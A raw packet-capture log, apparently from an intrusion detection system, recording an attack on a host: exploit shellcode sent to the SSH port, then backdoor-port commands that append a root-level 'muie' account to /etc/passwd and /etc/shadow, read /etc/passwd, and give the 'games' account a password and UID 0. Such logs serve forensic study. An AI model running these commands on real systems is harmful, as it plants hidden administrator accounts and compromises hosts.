09/19-03:25:19.092686 203.80.227.2:792 -> 192.168.20.1:22
TCP TTL:55 TOS:0x0 ID:49762 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x9E3C3F67  Ack: 0x74084955  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5257611 366995311
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
.............................................1..f..1...C.].C.].K
.M..M...1..E.Cf.].f.E.09.M..E..E..E.....M.....CC....C....1..?...
...A....^.u.1..F..E......M..U......../bin/sh.h0h0h0, 7350, zip/T
ESO!............................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
........................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


09/19-03:26:12.845007 24.72.1.111:1983 -> 192.168.20.1:12345
TCP TTL:44 TOS:0x60 ID:44497 IpLen:20 DgmLen:56 DF
***AP*** Seq: 0xE700CC6A  Ack: 0x75FE8AA2  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 424186111 367000104 
w;..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-03:28:42.524355 24.72.1.111:1983 -> 192.168.20.1:12345
TCP TTL:44 TOS:0x60 ID:44635 IpLen:20 DgmLen:109 DF
***AP*** Seq: 0xE700CC6E  Ack: 0x75FE8B2F  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 424201078 367000700 
echo "muie:x:0:501::/home/muie:/bin/bash">>/etc/passwd;..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-03:29:14.513739 24.72.1.111:1983 -> 192.168.20.1:12345
TCP TTL:44 TOS:0x60 ID:44712 IpLen:20 DgmLen:133 DF
***AP*** Seq: 0xE700CCA7  Ack: 0x75FE8B2F  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 424204279 367015663 
echo "muie:$1$U4BxCX2h$pJFV/Gp7aKbJ4h.Ygd5eZ0:11948:0:99999:7:::
">>/etc/shadow;..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-03:32:36.763462 24.72.1.111:1983 -> 192.168.20.1:12345
TCP TTL:44 TOS:0x60 ID:44903 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0xE700CCF8  Ack: 0x75FE8B2F  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 424224504 367018862 
cat /etc/passwd;..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-03:34:02.483737 24.72.1.111:1983 -> 192.168.20.1:12345
TCP TTL:44 TOS:0x60 ID:44968 IpLen:20 DgmLen:104 DF
***AP*** Seq: 0xE700CD0A  Ack: 0x75FE9061  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 424233077 367039096 
echo newoneop | passwd &> /dev/null --stdin games;..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-03:34:20.893598 24.72.1.111:1983 -> 192.168.20.1:12345
TCP TTL:44 TOS:0x60 ID:45075 IpLen:20 DgmLen:99 DF
***AP*** Seq: 0xE700CD3E  Ack: 0x75FE9061  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 424234917 367047663 
/usr/sbin/usermod &> /dev/null -u 0 -o games;..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Run time for packet processing was 0.141322 seconds